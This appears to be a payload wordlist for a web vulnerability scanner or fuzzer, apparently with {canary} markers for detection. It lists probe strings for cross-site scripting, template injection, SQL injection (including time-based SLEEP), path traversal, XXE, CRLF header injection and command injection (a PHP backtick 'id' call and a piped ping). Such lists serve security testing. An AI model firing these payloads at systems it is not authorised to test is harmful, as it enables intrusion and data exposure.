'
"
`
#
//
[]
{}
||
&&
^_*$
%00
%2527
%ff%fe
\u0027
&bsol;
<s>{canary}'"
" tabindex=1 onfocus=alert(1) x="
\"-alert(1)}//
"><img/src={canary} onerror=alert(1)>
#{15668*2}
${15668*2}
}}{{15668*2}}
<%= 15668*2 %>
${{<%[%'"{{%\
{{8*8}}[[5*5]]${7*4}
../../../
..\..\..\
null
undefined
{canary}()
${class.getResource("").getPath()}
__init__.__globals__["{module}"].config
<?xml version="1.0" encoding="utf-8?>
<!DOCTYPE xxe [<!ENTITY foo "{canary}">]><root>&foo;</root>
%0d%0a%0d%0aheader: {canary}
{canary}",'|&$;:`({@<%=
' OR 1=1-- -
SLEEP(10) /*’ or SLEEP(10) or’” or SLEEP(10) or “*/
a'a\'b"c>?>%}}%%>c<[[?${{%}}{canary}\
http://
{% debug %}
<?php echo `id`; ?>
|ping -c 30 127.0.0.1
~'!@#$%^&?*:()[]|\-_+,./
